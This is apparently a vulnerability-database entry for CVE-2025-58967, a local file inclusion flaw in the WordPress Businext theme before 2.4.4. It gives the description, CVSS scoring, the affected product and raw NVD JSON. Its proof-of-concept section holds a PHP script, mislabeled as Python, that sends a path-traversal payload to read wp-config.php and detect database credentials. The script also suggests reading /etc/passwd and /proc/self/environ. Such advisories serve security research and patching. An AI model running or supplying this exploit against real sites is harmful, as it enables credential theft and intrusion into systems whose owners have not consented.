Security Vulnerability Report
中文
CVE-2025-58967 CVSS 8.1 HIGH

CVE-2025-58967

Published: 2025-10-22 15:15:53
Last Modified: 2026-04-27 20:16:23

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Businext businext allows PHP Local File Inclusion.This issue affects Businext: from n/a through < 2.4.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thememove:businext:*:*:*:*:*:wordpress:*:* - VULNERABLE
Businext主题 < 2.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-58967 PoC - Businext Theme Local File Inclusion * Target: WordPress Businext Theme < 2.4.4 * Type: Local File Inclusion * * Usage: php poc.php target_url * Example: php poc.php http://target.com/ */ $target = $argv[1] ?? die("Usage: php poc.php <target_url>\n"); // Test reading wp-config.php $vulnerable_param = 'file'; // Common parameter name, may vary $payload = '../../../wp-config.php'; $url = $target . '?' . $vulnerable_param . '=' . urlencode($payload); echo "[*] CVE-2025-58967 - Businext LFI PoC\n"; echo "[*] Target: " . $target . "\n"; echo "[*] Testing LFI with wp-config.php read...\n\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if (strpos($response, 'DB_NAME') !== false || strpos($response, "define('DB") !== false) { echo "[+] VULNERABLE! Successfully read wp-config.php\n"; echo "[+] Database credentials found in response\n"; } else { echo "[-] Target may not be vulnerable or parameter name is incorrect\n"; echo "[-] HTTP Response Code: " . $http_code . "\n"; } echo "\n[*] Manual testing tip: Try different parameter names like 'page', 'template', 'include', etc.\n"; echo "[*] Also try reading: /etc/passwd, /proc/self/environ\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58967", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:53.090", "lastModified": "2026-04-27T20:16:23.083", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Businext businext allows PHP Local File Inclusion.This issue affects Businext: from n/a through < 2.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thememove:businext:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.4.4", "matchCriteriaId": "F28CBF03-8161-4815-9703-08B1F0BD98E3"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/businext/vulnerability/wordpress-businext-theme-2-4-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}